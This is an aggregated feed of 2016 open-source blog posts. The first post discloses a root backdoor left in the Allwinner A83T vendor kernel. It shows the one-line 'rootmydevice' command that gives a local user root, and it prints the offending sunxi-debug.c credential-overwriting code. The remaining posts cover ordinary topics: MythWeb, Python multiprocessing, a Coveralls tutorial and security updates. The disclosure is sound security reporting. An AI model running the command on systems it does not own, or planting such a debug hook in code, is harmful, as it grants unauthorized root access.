Most current ARM chips cannot run with the stock, upstream Linux kernel. Then require a set of patches that different vendors pile up to support their basic hardware (remember those systems are almost always systems-on-a-chip (SoC)). Some vendors do take the hard work to try to upstream their changes — that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it.

So, in many cases, we are stuck running with nonstandard kernels, full with huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right?

Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel.

This kernel has a very ugly flaw: A debugging mode left open, that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:

  1. Debian GNU/Linux 8 bananapi ttyS0
  2.  
  3. banana login: gwolf
  4. Password:
  5.  
  6. Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
  7. Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l
  8.  
  9. The programs included with the Debian GNU/Linux system are free software;
  10. the exact distribution terms for each program are described in the
  11. individual files in /usr/share/doc/*/copyright.
  12.  
  13. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  14. permitted by applicable law.
  15.  
  16. gwolf@banana:~$ id
  17. uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
  18. gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
  19. gwolf@banana:~$ id
  20. groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)

Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):

  1. if(!strncmp("rootmydevice",(char*)buf,12)){
  2. cred = (struct cred *)__task_cred(current);
  3. cred->uid = 0;
  4. cred->gid = 0;
  5. cred->suid = 0;
  6. cred->euid = 0;
  7. cred->euid = 0;
  8. cred->egid = 0;
  9. cred->fsuid = 0;
  10. cred->fsgid = 0;
  11. printk("now you are root\n");
  12. }

Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines — the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files lack from this same basic issue — and having this upstreamed will become a titanic task. If their programmers tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work.

Anyway, enough said by me. Some other sources of information:

There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

by gwolf at 2016-05-14 00:58

Planet GNOME

Bradley M. Kuhn: MythWeb Confusing Error Message - Planet GNOME

I'm finally configuring Kodi properly to watch over-the-air channels using this this USB ATSC / DVB-T tuner card from Thinkpenguin. I hate taking time away, even on the weekends, from the urgent Conservancy matters but I've been doing by-hand recordings using VLC for my wife when she's at work, and I just need to present a good solution to my home to showcase software freedom here.

So, I installed Debian testing to get a newr Kodi, I did discover this bug after it had already been closed but had to pull util-linux out of unstable for the moment since it hadn't moved to testing.

Kodi works fine after installing it via apt, and since VDR is packaged for Debian, I tried getting VDR working instead of MythTV at first. I almost had it working but then I got this error:

VNSI-Error: cxSocket::read: read() error at 0/4
when trying to use kodi-pvr-vdr-vnsi (1.11.15-1) with vdr-plugin-vnsiserver (1:1.3.1) combined with vdr (2.2.0-5) and kodi (16.0+dfsg1-1). I tried briefly using the upstream plugins for both VDR and Kodi just to be sure I'd produce the same error, and got the same so I started by reporting this on the Kodi VDR backend forum. If I don't get a response there in a few weeks, I'll file it as a bug against kodi-pvr-vdr-vnsi instead.

For now, I gave up on VDR (which I rather liked, very old-school Unix-server module was to build a PVR), and tried MythTV instead since it's also GPL'd. Since there weren't Debian packages, I followed this building from source tutorial on MythTV's website.

I didn't think I'd actually need to install MythWeb at first, because I am using Kodi primarily and am only using MythTV backend to handle the tuner card. It was pretty odd that you can only configure MythTV via a QT program called mythtv-setup, but ok, I did that, and it was relatiavely straight forward. Once I did, playback was working reasonable using Kodi's MythTV plugin. (BTW, if you end up doing this, it's fine to test Kodi as its own in a window with a desktop environment running, but I had playback speed issues in that usage, but they went away fully when I switched to a simple .xinitrc that just called kodi-standalone.

The only problem left was that I noticed that I was not getting Event Information Table (EIT) data from the card to add to the Electronic Program Guide (EPG). Then I discovered that one must install MythWeb for the EIT data to make it through via the plugin for EPG in Kodi. Seems weird to me, but ok, I went to install MythWeb.

Oddly, this is where I had the most trouble, constantly receiving this error message:

PHP Fatal error: Call to a member function query_col() on null in /path/to/mythweb/modules/backend_log/init.php on line 15

The top net.search hit is likely to be this bug ticket which out points out that this is a horrible form of an error message to tell you the equivalent of “something is strange about the database configuration, but I'm not sure what”.

Indeed, I tried a litany of items which i found through lots of net.searching. Unfortunately I got a bit frantic, so I'm not sure which one solved my problem (I think it was actually quite obviously multiple ones :). I'm going to list them all here, in one place, so that future searchers for this problem will find all of them together:

  • Make sure the PHP load_path is coming through properly and includes the MythTV backend directory, ala:
    setenv include_path "/path/to/mythtv/share/mythtv/bindings/php/"
  • Make sure the mythtv user has a password set properly and is authorized in the database users table to have access from localhost, ::1, and 127.*, as it's sometimes unclear which way Apache might connect.
  • In Debian testing, make sure PHP 7 is definitely not in use by MythWeb (I am guessing it is incompatible), and make sure the right PHP5 MySql modules are installed. The MythWeb installation instructions do say:
    apache2-mpm-prefork php5 php5-mysql libhttp-date-perl
    And at one point, I somehow got php5-mysql installed and libapache2-mod-php5 without having php5 installed, which I think may have caused a problem.
  • Also, read

    this thread from the MythTV mailing list as it is the most comprehensive in discussing this error.

I did have to update the channel lineup with mythfilldatabase --dd-grab-all

by Bradley M. Kuhn (bkuhn@ebb.org) at 2016-05-14 00:54

Bradley M. Kuhn: That “My Ears are Burning” Thing Is Definitely Apocryphal - Planet GNOME

I've posted in the past about the Oracle vs. Google case. I'm for the moment sticking to my habit of only commenting when there is a clear court decision. Having been through litigation as the 30(b)(6) witness for Conservancy, I'm used to court testimony and why it often doesn't really matter in the long run. So much gets said by both parties in a court case that it's somewhat pointless to begin analyzing each individual move, unless it's for entertainment purposes only. (It's certainly as entertaining as most TV dramas, really, but I hope folks who are watching step-by-step admit to themselves that they're just engaged in entertainment, not actual work. :)

I saw a lot go by today with various people as witnesses in the case. About the only part that caught my attention was that Classpath was mentioned over and over again. But that's not for any real salient reason, only because I remember so distinctly, sitting in a little restaurant in New Orleans with RMS and Paul Fisher, talking about how we should name this yet-to-be-launched GNU project “$CLASSPATH”. My idea was that was a shell variable that would expand to /usr/lib/java, so, in my estimation, it was a way to name the project “User Libraries for Java” without having to say the words. (For those of you that were still children in the 1990s, trademark aggression by Sun at the time on the their word mark for “Java” was fierce, it was worse than the whole problem the Unix trademark, which led in turn to the GNU name.)

But today, as I saw people all of the Internet quoting judges, lawyers and witnesses saying the word “Classpath” over and over again, it felt a bit weird to think that, almost 20 years ago sitting in that restaurant, I could have said something other than Classpath and the key word in Court today might well have been whatever I'd said. Court cases are, as I said, dramatic, and as such, it felt a little like having my own name mentioned over and over again on the TV news or something. Indeed, I felt today like I had some really pointless, one-time-use superpower that I didn't know I had at the time. I now further have this feeling of: “darn, if I knew that was the one thing I did that would catch on this much, I'd have tried to do or say something more interesting”.

Naming new things, particularly those that have to replace other things that are non-Free, is really difficult, and, at least speaking for myself, I definitely can't tell when I suggest a name whether it is any good or not. I actually named another project, years later, that could theoretically get mentioned in this case, Replicant. At that time, I thought Replicant was a much more creative name than Classpath. When I named Classpath, I felt it was somewhat obvious corollary to the “GNU'S Not Unix” line of thinking. I also recall distinctly that I really thought the name lost all its cleverness when the $ and the all-caps was dropped, but RMS and others insisted on that :).

Anyway, my final message today is to the court transcribers. I know from chatting with the court transcribers during my depositions in Conservancy's GPL enforcement cases that technical terminology is really a pain. I hope that the term I coined that got bandied about so much in today's testimony was not annoying to you all. Really, no one thinks about the transcribers in all this. If we're going to have lawsuits about this stuff, we should name stuff with the forethought of making their lives easier when the litigation begins. :)

by Bradley M. Kuhn (bkuhn@ebb.org) at 2016-05-14 00:54

May 13, 2016

Planet Python

Peter Bengtsson: Time to do concurrent CPU bound work - Planet Python

Did you see my blog post about Decorated Concurrency - Python multiprocessing made really really easy? If not, fear not. There, I'm demonstrating how I take a task of creating 100 thumbnails from a large JPG. First in serial, then concurrently, with a library called deco. The total time to get through the work massively reduces when you do it concurrently. No surprise. But what's interesting is that each individual task takes a lot longer. Instead of 0.29 seconds per image it took 0.65 seconds per image (...inside each dedicated processor).

The simple explanation, even from a layman like myself, must be that when doing so much more, concurrently, the whole operating system struggles to keep up with other little subtle tasks.

With deco you can either let Python's multiprocessing just use as many CPUs as your computer has (8 in the case of my Macbook Pro) or you can manually set it. E.g. @concurrent(processes=5) would spread the work across a max of 5 CPUs.

So, I ran my little experiment again for every number from 1 to 8 and plotted the results:

Time elapsed vs. work time

What to take away...

The blue bars is the time it takes, in total, from starting the program till the program ends. The lower the better.

The red bars is the time it takes, in total, to complete each individual task.

Meaning, when the number of CPUs is low you have to wait longer for all the work to finish and when the number of CPUs is high the computer needs more time to finish its work. This is an insight into over-use of operating system resources.

If the work is much much more demanding than this experiment (the JPG is only 3.3Mb and one thumbnail only takes 0.3 seconds to make) you might have a red bar on the far right that is too expensive for your server. Or worse, it might break things so that everything stops.

In conclusion...

Choose wisely. Be aware how "bound" the task is.

Also, remember that if the work of each individual task is too "light", the overhead of messing with multprocessing might actually cost more than it's worth.

The code

Here's the messy code I used:

import time
from PIL import Image
from deco import concurrent, synchronized
import sys

processes = int(sys.argv[1])
assert processes >= 1
assert processes <= 8


@concurrent(processes=processes)
def slow(times, offset):
    t0 = time.time()
    path = '9745e8.jpg'
    img = Image.open(path)
    size = (100 + offset * 20, 100 + offset * 20)
    img.thumbnail(size, Image.ANTIALIAS)
    img.save('thumbnails/{}.jpg'.format(offset), 'JPEG')
    t1 = time.time()
    times[offset] = t1 - t0


@synchronized
def run(times):
    for index in range(100):
        slow(times, index)

t0 = time.time()
times = {}
run(times)
t1 = time.time()
print "TOOK", t1-t0
print "WOULD HAVE TAKEN", sum(times.values())

by Planet Python at 2016-05-13 22:41

LWN.net

Schaller: H264 in Fedora Workstation - LWN.net

At his blog, Christian Schaller discusses the details of the OpenH264 media codec from Cisco, which is now available in Fedora. In particular, he notes that the codec only handle the H.264 "Baseline" profile. "So as you might guess from the name Baseline, the Baseline profile is pretty much at the bottom of the H264 profile list and thus any file encoded with another profile of H264 will not work with it. The profile you need for most online videos is the High profile. If you encode a file using OpenH264 though it will work with any decoder that can do Baseline or higher, which is basically every one of them." Wim Taymans of GStreamer is looking at improving the codec with Cisco's OpenH264 team.

by n8willis at 2016-05-13 22:11

Planet Ubuntu

Aaron Honeycutt: Some LoCo updates - Planet Ubuntu

Ubuntu 16.04 LTS Release:

I did not get around to posting the results for the 16.04 LTS release party since I locked myself out of this blog lol.

Here are some pictures! Even my dad got into the release spirit!

highres_448524371 highres_448528960 highres_448528986

On to Ubuntu Hour’s:

We’re still having them and I think they are going very well bring in some new people every so often.

highres_445748101

SELF 2016

SouthEast Linux Fest is right around the corner! Starting on June 9 and the Florida LoCo will be there of course!

Up next will be a Ubuntu Touch update which I’ll get out within the next week. Thanks for reading!

by Planet Ubuntu at 2016-05-13 19:06

Damn Interesting

Into the Bewilderness - Damn Interesting

Charles Waterton was born in Yorkshire, England in 1782, to an aristocratic Catholic family whose ancestors included members of several royal families. The life of an idle nobleman didn’t appeal to him, however. From a young age, he displayed a passion for studying and interacting with animals in a very hands-on way.

An inveterate tree-climber, Waterton was grateful for the wide array of bird species found on his family’s estate. He was so much of a birdbrain that teachers complained of his “vast proficiency in the art of finding birds’ nests” distracting him from his studies. Like his teachers, Waterton’s classmates noticed his fondness for being amongst animals. He was the one called upon when the boys wanted someone to tame an angry goose, or to ride a cow for their entertainment. He was even appointed rat catcher at his Jesuit boys’ school.

Waterton’s youthful interest in trapping the animals around him evolved into a specialist desire to understand less common animals. This being the Victorian era, and Waterton having the time and money to devote to his preoccupations, his obsessions prompted amusement in the readers of his prolific writings, rather than consternation. For instance, he once described a dissection of a vulture’s nose as “beautiful.” And he was an expert on how a variety of tropical animals, from the howler monkey to the toucan, tasted. The former, apparently, is not dissimilar to goat, while the latter should be boiled for best results.

This type of contradiction–being moved by animals, yet also scientifically dedicated to studying them by killing and preserving them in scientifically novel ways–would be a theme throughout Waterton’s life. The man clearly had complex feelings about his relationships with animals. Perhaps the most significant of these feelings was the desire to transcend the divisions within the animal kingdom: divisions between animals, but also ones separating himself and the creatures he loved.

Continue reading ▶

by Alan Bellows (webmaster@damninteresting.com) at 2016-05-13 19:00

Planet Python

Peter Bengtsson: Decorated Concurrency - Python multiprocessing made really really easy - Planet Python

tl;dr There's a new interesting wrapper on Python multiprocessing called deco, written by Alex Sherman and Peter Den Hartog, both at University of Wisconsin - Madison. It makes Python multiprocessing really really easy.

The paper is here (PDF) and the code is here: https://github.com/alex-sherman/deco.

This library is based on something called Pydron which, if I understand it correctly, is still a piece of research with no code released. ("We currently estimate that we will be ready for the release in the first quarter of 2015.")

Apart from using simple decorators on functions, the big difference that deco takes, is that it makes it really easy to get started and that there's a hard restriction on how to gather the results of sub-process calls'. In deco, you pass in a mutable object that has a keyed index (e.g. a python dict). A python list is also mutable but it doesn't have an index. Meaning, you could get race conditions on mylist.append().

"However, DECO does impose one important restriction on the program: all mutations may only by index based."

Some basic example

Just look at this example:

# before.py

def slow(index):
    time.sleep(5)

def run():
    for index in list('123'):
        slow(index)
run()

And when run, you clearly expect it to take 15 seconds:

$ time python before.py

real    0m15.090s
user    0m0.057s
sys 0m0.022s

Ok, let's parallelize this with deco. First pip install deco, then:

# after.py

from deco import concurrent, synchronized

@concurrent
def slow(index):
    time.sleep(5)

@synchronized
def run():
    for index in list('123'):
        slow(index)

run()

And when run, it should be less than 15 seconds:

$ time python after.py

real    0m5.145s
user    0m0.082s
sys 0m0.038s

About the order of execution

Let's put some logging into that slow() function above.

def slow(index):
    time.sleep(5)
    print 'done with {}'.format(index)

Run the example a couple of times and note that the order is not predictable:

$ python after.py
done with 1
done with 3
done with 2
$ python after.py
done with 1
done with 2
done with 3
$ python after.py
done with 3
done with 2
done with 1

That probably don't come as a surprise for those familiar with async stuff, but it's worth reminding so you don't accidentally depend on order.

@synchronized or .wait()

Remember the run() function in the example above? The @synchronized decorator is magic. It basically figures out that within the function call there are calls out to sub-process work. What it does it that it "pauses" until all those have finished. An alternative approach is to call the .wait() method on the decorated concurrency function:

def run():
    for index in list('123'):
        slow(index)
    slow.wait()

That works the same way. This could potentially be useful if you, on the next line, need to depend on the results. But if that's the case you could just split up the function and slap a @synchronized decorator on the split-out function.

No Fire-and-forget

It might be tempting to not set the @synchronized decorator and not call .wait() hoping the work will be finished anyway somewhere in the background. The functions that are concurrent could be, for example, functions that generate thumbnails from a larger image or something time consuming where you don't care when it finishes, as long as it finishes.

# fireandforget.py
# THIS DOES NOT WORK
# And it's not expected to either.

@concurrent
def slow(index):
    time.sleep(5)

def run():
    for index in list('123'):
        slow(index)

run()

When you run it, you don't get an error:

$ time python fireandforget.py

real    0m0.231s
user    0m0.079s
sys 0m0.047s

But if you dig deeper, you'll find that it never actually executes those concurrent functions.

If you want to do fire-and-forget you need to have another service/process that actually keeps running and waiting for all work to be finished. That's how the likes of a message queue works.

Number of concurrent workers

multiprocessing.Pool automatically, as far as I can understand, figures out how many concurrent jobs it can run. On my Mac, where I have 8 CPUS, the number is 8.

This is easy to demonstrate. In the example above it does exactly 3 concurrent jobs, because len(list('123')) == 3. If I make it 8 items, the whole demo run takes, still, 5 seconds (plus a tiny amount of overhead). If I make it 9 items, it now takes 10 seconds.

How multiprocessing figures this out I don't know but I can't imagine it being anything but a standard lib OS call to ask the operating system how many CPUs it has.

You can actually override this with your own number. It looks like this:

from deco import concurrent

@concurrent(processes=5)
def really_slow_and_intensive_thing():
    ...

So that way, the operating system doesn't get too busy. It's like a throttle.

A more realistic example

Let's actually use the mutable for something and let's do something that isn't just a time.sleep(). Also, let's do something that is CPU bound. A lot of times where concurrency is useful is when you're network bound because running many network waiting things at the same time doesn't hose the system from being able to do other things.

Here's the code:

from PIL import Image
from deco import concurrent, synchronized


@concurrent
def slow(times, offset):
    t0 = time.time()
    path = '9745e8.jpg'
    img = Image.open(path)
    size = (100 + offset * 20, 100 + offset * 20)
    img.thumbnail(size, Image.ANTIALIAS)
    img.save('thumbnails/{}.jpg'.format(offset), 'JPEG')
    t1 = time.time()
    times[offset] = t1 - t0

@synchronized
def run(times):
    for index in range(100):
        slow(times, index)

t0 = time.time()
times = {}
run(times)
t1 = time.time()
print "TOOK", t1-t0
print "WOULD HAVE TAKEN", sum(times.values())

It generates 100 different thumbnails from a very large original JPG. Running this on my macbook pro takes 8.4 seconds but the individual times was a total of 65.1 seconds. The numbers makes sense, because 65 seconds / 8 cores ~= 8 seconds.

But, where it gets really interesting is that if you remove the deco decorators and run 100 thumbnail creations in serial, on my laptop, it takes 28.9 seconds. Now, 28.9 seconds is much more than 8.4 seconds so it's still a win to multiprocessing for this kind of CPU bound work. However, stampeding herd of doing 8 CPU intensive tasks at the same time can put some serious strains on your system. Also, it could cause high spikes in terms of memory allocation that wouldn't have happened if freed space can be re-used in the serial pattern.

Here's by the way the difference in what this looks like in the Activity Monitor:

Fully concurrent PIL work

Running PIL in all CPUs

Same work but in serial

In serial

One more "realistic" pattern

Let's do this again with a network bound task. Let's download 100 webpages from my blog. We'll do this by keeping an index where the URL is the key and the value is the time it took to download that one individual URL. This time, let's start with the serial pattern:

(Note! I ran these two experiments a couple of times so that the server-side cache would get a chance to clear out outliers)

import time, requests

urls = """
https://www.peterbe.com/plog/blogitem-040212-1
https://www.peterbe.com/plog/geopy-distance-calculation-pitfall
https://www.peterbe.com/plog/app-for-figuring-out-the-best-car-for-you
https://www.peterbe.com/plog/Mvbackupfiles
...a bunch more...
https://www.peterbe.com/plog/swedish-holidays-explaine
https://www.peterbe.com/plog/wing-ide-versus-jed
https://www.peterbe.com/plog/worst-flash-site-of-the-year-2010
""".strip().splitlines()
assert len(urls) == 100

def download(url, data):
    t0 = time.time()
    assert requests.get(url).status_code == 200
    t1 = time.time()
    data[url] = t1-t0

def run(data):
    for url in urls:
        download(url, data)

somemute = {}
t0 = time.time()
run(somemute)
t1 = time.time()
print "TOOK", t1-t0
print "WOULD HAVE TAKEN", sum(somemute.values()), "seconds"

When run, the output is:

TOOK 35.3457410336
WOULD HAVE TAKEN 35.3454759121 seconds

Now, let's add the deco decorators, so basically these changes:

from deco import concurrent, synchronized

@concurrent
def download(url, data):
    t0 = time.time()
    assert requests.get(url).status_code == 200
    t1 = time.time()
    data[url] = t1-t0

@synchronized
def run(data):
    for url in urls:
        download(url, data)

And the output this time:

TOOK 5.13103795052
WOULD HAVE TAKEN 39.7795288563 seconds

So, instead of it having to take 39.8 seconds it only needed to take 5 seconds with extremely little modification. I call that a win!

What's next

Easy; actually build something that uses this.

by Planet Python at 2016-05-13 16:57

LWN.net

Friday's security updates - LWN.net

Arch Linux has updated chromium (multiple vulnerabilities), flashplugin (multiple vulnerabilities), lib32-flashplugin (multiple vulnerabilities), and libksba (denial of service).

CentOS has updated thunderbird (C7: multiple vulnerabilities).

Debian has updated libxstream-java (XML external-entity attack).

Debian-LTS has updated libgwenhywfar (outdated CA certificates) and libuser (multiple vulnerabilities).

Fedora has updated glibc (F23: denial of service).

Mageia has updated flash-player-plugin (M5: multiple vulnerabilities) and mercurial (M5: code execution).

openSUSE has updated libxml2 (Leap 42.1: denial of service) and ntp (Leap 42.1: multiple vulnerabilities).

Oracle has updated kernel (O7: privilege escalation) and thunderbird (O7; O6: multiple vulnerabilities).

Red Hat has updated chromium-browser (RHEL6: multiple vulnerabilities), docker (RHEL7: privilege escalation), flash-plugin (RHEL 5,6: multiple vulnerabilities), and openshift (RHOSE 3.2: multiple vulnerabilities).

SUSE has updated java-1_7_1-ibm (SLE12; SLE11: multiple vulnerabilities), ntp (SLE12: multiple vulnerabilities), and openssl (SLE11, SSO1.3, SOSC5, SMP2.1, SM2.1: multiple vulnerabilities).

by n8willis at 2016-05-13 16:34

planet.freedesktop.org

Bastien Nocera: Blutella, a Bluetooth speaker receiver - planet.freedesktop.org

Quite some time ago, I was asked for a way to use the AV amplifier (which has a fair bunch of speakers connected to it) in our living-room that didn't require turning on the TV to choose a source.

I decided to try and solve this problem myself, as an exercise rather than a cost saving measure (there are good-quality Bluetooth receivers available for between 15 and 20€).

Introducing Blutella



I found this pot of Nutella in my travels (in Europe, smaller quantities are usually in a jar that looks like a mustard glass, with straight sides) and thought it would be a perfect receptacle for a CHIP, to allow streaming via Bluetooth to the amp. I wanted to make a nice how-to for you, dear reader, but best laid plans...

First, the materials:
  • a CHIP
  • jar of Nutella, and "Burnt umber" acrylic paint
  • micro-USB to USB-A and jack 3.5mm to RCA cables
  • Some white Sugru, for a nice finish around the cables
  • bit of foam, a Stanley knife, a CD marker

That's around 10€ in parts (cables always seem to be expensive), not including our salvaged Nutella jar, and the CHIP itself (9$ + shipping).

You'll start by painting the whole of the jar, on the inside, with the acrylic paint. Allow a couple of days to dry, it'll be quite thick.

So, the plan that went awry. Turns out that the CHIP, with the cables plugged in, doesn't fit inside this 140g jar of Nutella. I also didn't make the holes exactly in the right place. The CHIP is tiny, but not small enough to rotate inside the jar without hitting the side, and the groove to screw the cap also have only one position.

Anyway, I pierced two holes in the lid for the audio jack and the USB charging cable, stuffed the CHIP inside, and forced the lid on so it clipped on the jar's groove.

I had nice photos with foam I cut to hold the CHIP in place, but the finish isn't quite up to my standards. I guess that means I can attempt this again with a bigger jar ;)

The software

After flashing the CHIP with Debian, I logged in, and launched a script which I put together to avoid either long how-tos, or errors when I tried to reproduce the setup after a firmware update and reset.

The script for setting things up is in the CHIP-bluetooth-speaker repository. There are a few bugs due to drivers, and lack of integration, but this blog is the wrong place to track them, so check out the issues list.

Apart from those driver problems, I found the integration between PulseAudio and BlueZ pretty impressive, though I wish there was a way for the speaker to reconnect to the phone I streamed from when turned on again, as Bluetooth speakers and headsets do, removing one step from playing back audio.

by planet.freedesktop.org at 2016-05-13 16:30

Planet Python

PythonClub - A Brazilian collaborative blog about Python: Python com Unittest, Travis CI, Coveralls e Landscape (Parte 3 de 4) - Planet Python

Fala pessoal, tudo bem?

Na segunda parte deste tutorial, aprendemos a usar o Travis CI para automatizar os testes do nosso projeto, facilitando a manutenção do código quando temos vários colaboradores. Nesta terceira parte, vamos configurar o serviço Coveralls para que o mesmo gere relatórios de teste sobre o nosso projeto. Os relatórios são muito úteis quando desejamos verificar o quanto do nosso projeto está coberto por testes, evitando assim que alguma feature importante fique de fora. Assim como o Travis CI, o Coveralls será executado após cada push ou pull request.

Diferente do tutorial anterior, serei breve sobre o processo de inscrição do Coveralls, focando mais no seu uso.

Criando uma conta

Antes de começarmos a usar o Coveralls precisamos criar uma conta no serviço. Isso pode ser feito aqui. O serviço é totalmente gratuíto para projetos opensource.

Após a inscrição, você será levado para uma nova página com uma listagem dos repositórios que você possui no Github.

Na imagem acima já podemos visualizar o projeto que estou usando neste tutorial: codigo-avulso-test-tutorial. Caso o seu repositório não esteja na lista, clique no botão ADD REPOS no canto superior direito da tela.

Ao clicar no botão, você será redirecionado a uma página onde é possível slecionar quais repositórios serão analisados pelo Coveralls. Caso o repositório desejado não esteja na lista, clique no botão RE-SYNC REPOS no canto superior direito. Ele vai realizar o escaneamento do seu perfil no Github e importar seus projetos.

Clique no botão escrito OFF ao lado esquerdo do nome do repositório. Isso ativará o serviço para este repositório.

Clique no botão DETAILS ao lado direito do nome do repositório e você será redirecionado para uma tela de configuração. Aqui o passo mais interessante é pegar a url da badgepara usarmos em nosso README.md.

Coverage Status

Na área superior da tela, temos o seguinte:

Clique em EMBED e uma janelá de dialogo irá se abrir, selecione e copie o código em MARKDOWN.

Agora cole o código no cabeçalho do seu arquivo README.md, semelhante ao que fizemos com o Travis CI no tutorial anterior.

# Codigo Avulso Test Tutorial
[![Build Status](https://travis-ci.org/mstuttgart/codigo-avulso-test-tutorial.svg?branch=master)](https://travis-ci.org/mstuttgart/codigo-avulso-test-tutorial)

[![Coverage Status](https://coveralls.io/repos/github/mstuttgart/codigo-avulso-test-tutorial/badge.svg?branch=master)](https://coveralls.io/github/mstuttgart/codigo-avulso-test-tutorial?branch=master)

Concluída esta estapa, o próximo passo será adicionarmos o serviço em nosso projeto no Github.

Adicionando o Coveralls

Vamos adicionar o serviço durante o processo de teste do projeto. Assim, depois de cada push ou pull request, o Coveralls irá gerar o relatório sobre nossos testes.

Abra o arquivo .travis.yml em seu editor. Teremos o seguinte código:

language: python

python:
  - "2.7"

sudo: required

install:
  - pip install flake8

before_script:
  - flake8 codigo_avulso_test_tutorial

script:
  - run setup.py test

Agora vamos alterá-lo adicionando a funcionalidade do Coveralls. O códio atualizado do .travis.yml pode ser visto a seguir:

language: python

python:
  - "2.7"

sudo: required

install:
  - pip install flake8
  - pip install coveralls

before_script:
  - flake8 codigo_avulso_test_tutorial

script:
  - coverage run --source=codigo_avulso_test_tutorial setup.py test

after_success:
  - coveralls
  • install: aqui adicionamos o comando pip install coveralls. A instalação do coveralls é necessaria para que possamos gerar os relatórios. Obs.: Você pode instalá-lo em sua máquina e gerar relátorios em html. Fica a sugestão de estudo.
  • script: aqui substimuímos o comando run setup.py test por coverage run --source=codigo_avulso_test_tutorial setup.py test. Esse comando executa os mesmo testes de antes, mas já prove um relatório sobre a cobertura de testes do seu código.
  • after_success: a última alteração foi adicionar a tag after_success. Essa tag indica que após a execuação bem sucedida dos testes, deve-se iniciar o serviço de analise do Coveralls.

Assim que terminar de fazer essas alterações você já pode enviar o seu código para o Github. Assim que subir o código, o Travis CI irá iniciar o processo de teste. Finalizando os testes, o Coverallsserá iniciado. Se tudo ocorrer bem, a badge que adicionamos no aquivo README do projeto será atualizada exibindo a porcentagem do nosso código que está coberta por testes. Você pode clicar na badge ou ir até o seu perfil no site do Coveralls e verificar com mais detalhes as informações sobre seu projeto.

Na seção LATEST BUILDS clique no último build disponível que será possível verificar a porcentagem cobertura de teste para cada arquivo do seu projeto.

Caso tenha interessa, aqui está o link do repositorio que usei para esse tutorial: codigo-avulso-test-tutorial.

Conclusão

Aqui encerramos a terceira parte do nossa série de tutoriais sobre Unittest. O Coveralls ainda possui muitas configurações não mostradas aqui, então se você se interessar, fica a sugestão de estudo. No próximo tutorial veremos como utilizar o Landscape, um linter que analise nossos códigos atrás de problemas de sintaxe, formatação e possíveis erros de códigos (variáveis não declaradas, varíaveis com escopo incorreto e etc).

É isso pessoal. Obrigado por ler até aqui e até o próximo tutorial!

Publicado originalmente: python-com-unittest-travis-ci-coveralls-e-landscape-parte-3-de-4

by Planet Python at 2016-05-13 15:25

Reinout van Rees: Pygrunn keynote: the future of programming - Steven Pemberton - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Steven Pemberton (https://en.wikipedia.org/wiki/Steven_Pemberton) is one of the developers of ABC, a predecessor of python.

He's a researcher at CWI in Amsterdam. It was the first non-military internet site in Europe in 1988 when the whole of Europe was still connected to the USA with a 64kb link.

When designing ABC they were considered completely crazy because it was an interpreted language. Computers were slow at that time. But they knew about Moore's law. Computers would become much faster.

At that time computers were very, very expensive. Programmers were basically free. Now it is the other way. Computers are basically free and programmers are very expensive. So, at that time, in the 1950s, programming languages were designed around the needs of the computer, not the programmer.

Moore's law is still going strong. Despite many articles claiming its imminent demise. He heard the first one in 1977. Steven showed a graph of his own computers. It fits.

On modern laptops, the CPU is hardly doing anything most of the time. So why use programming languages optimized for giving the CPU a rest?

There's another cost. The more lines a program has, the more bugs there are in it. But it is not a linear relationship. More like lines ^ 1.5. So a program with 10x more lines probably has 30x more bugs.

Steven thinks the future of programming is in declarative programming instead of in procedural programming. Declarative code describes what you want to achieve and not how you want to achieve it. It is much shorter.

Procedural code would have specified everything in detail. He showed a code example of 1000 lines. And a declarative one of 15 lines. Wow.

He also showed an example with xforms, which is declarative. Projects that use it regularly report a factor of 10 in savings compared to more traditional methods. He mentioned a couple of examples.

Steven doesn't necessarily want us all to jump on Xforms. It might not fit with our usecases. But he does want us to understand that declarative languages are the way to go. The approach has been proven.

In response to a question he compared it to the difference between roman numerals and arabic numerals and the speed difference in using them.

(The sheets will be up on http://homepages.cwi.nl/~steven/Talks/2016/05-13-pygrunn/ later).

by Planet Python at 2016-05-13 14:24

Charlie's Diary

Three Unexpectedly Good Things VR Will Probably Cause - Charlie's Diary


This is a guest post by filmmaker and VR developer Hugh Hancock.

OK, at this point we can call it. VR is definitely here, it works, and it's not going away.

I was one of the first people in the UK to get the consumer version of the HTC Vive, the VR headset designed around standing up and walking around in a virtual space, not just sitting looking at it. I bought it for research rather than because I was sure it would be good - but when it arrived, it was absolutely amazing.

We're in full-on Holodeck territory here. Whether you're shooting ninjas with arrows or wandering around on the bottom of the ocean, it's incredibly immersive. And Valve's legendary "taking a dog for a walk" sim is... well, just spookily good.

So yeah. It arrived. I used it. I promptly put every project on my slate on hold and decided to focus on room-scale VR for the indefinite future.

It's that good.

Now, it's all but guaranteed that we're going to see a lot of scaremongering about VR in the near future. It's ripe for the next moral panic, and there are plenty of people looking for clicks on their articles about how VR must be banned now or it will cause the end of humanity.

So I thought I'd get in there first - with some unforseen side-effects of VR I've observed or learned about that will make the world better, not worse...

Fitter Nerds

Here's a video of one of the projects I've been experimenting with for the Vive:

